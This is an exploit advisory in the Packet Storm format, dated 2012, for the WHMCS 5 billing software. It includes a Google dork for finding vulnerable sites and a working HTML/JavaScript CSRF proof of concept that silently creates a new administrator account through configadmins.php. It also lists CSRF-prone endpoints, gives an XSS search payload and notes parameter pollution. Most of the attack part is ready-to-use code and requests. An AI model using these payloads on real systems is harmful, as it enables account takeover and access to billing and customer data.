WHMCS 5 Cross Site Request Forgery / Cross Site Scripting

2012-05-30T00:00:00
ID PACKETSTORM:113128
Type packetstorm
Reporter Shadman Tanjim
Modified 2012-05-30T00:00:00

Description

                                        
                                            `##########################################################################################################################  
# Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability  
# Version: Latest version 5.1 and other previous version maybe vulnerable   
# Vendor: www.whmcs.com  
# Date: 2012-05-30  
# Tested on: win/linux  
# Author/Found by: Shadman Tanjim  
# Email: shadman2600@gmail.com  
# Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army.  
# Special Thanks: x8631p   
# Google Dork: "Powered by WHMCompleteSolution" or inurl:WHMCS   
############################################################################################################################  
  
CSRF Vulnerability:  
  
Get:  
http://site.com/clientarea.php   
http://site.com/admin/index.php   
http://site.com/admin/login.php   
  
Post:  
http://site.com/admin/login.php  
http://site.com/cart.php  
http://site.com/admin/configadmins.php  
http://site.com/pwreset.php  
  
  
p0c:  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  
<html>  
<head>  
<h2>WHMCS CSRF ExpL0iT PoC</h2>  
</head>  
<script language="javascript" type="text/javascript" >  
  
function lifeissimple() {  
  
var token = "Token Value";  
  
var img = document.createElement("img");  
var site="http://www.localhost.com:80";  
var requesturl = site + "/billing/admin/configadmins.php?action=save&id=&token=" + token + "&roleid=1&firstname=dead&lastname=cow&email=deadcow@deadcow.com&username=deadcow&password=deadcow&password2=deadcow&deptids[]=4&deptids[]=1&signature=deadcow&notes=deadcow&template=blend&language=English";  
img.setAttribute("src", requesturl);  
document.body.appendChild(img);  
  
var img2 = document.createElement("img");  
img2.setAttribute("src", site+"/billing/admin/configadmins.php?added=true&");  
document.body.appendChild(img);  
}  
  
</script>  
<body onload="lifeissimple();">  
  
</body>  
</html>  
  
  
Cross-site Scripting (XSS) Vulnerability:   
  
request:POST http://site.com/knowledgebase.php?action=search HTTP/1.1  
Content-Type: application/x-www-form-urlencoded  
  
search='%20onerror%3D'f(PSRyh)  
  
  
HTTP Parameter Pollution :  
  
1.Affected link: http://site.com/cart.php?a=add&domain=transfer&n913620=v992636  
Affected parameter: a=add  
  
2. Affected link: http://site.com/domainchecker.php?search=bulkregister&n946774=v992350  
Affected parameter: search=bulkregister  
  
3. Affected link: http://site.com/cart.php?currency=2&gid=1&n972751=v976696  
Affected parameter: currency=2  
  
`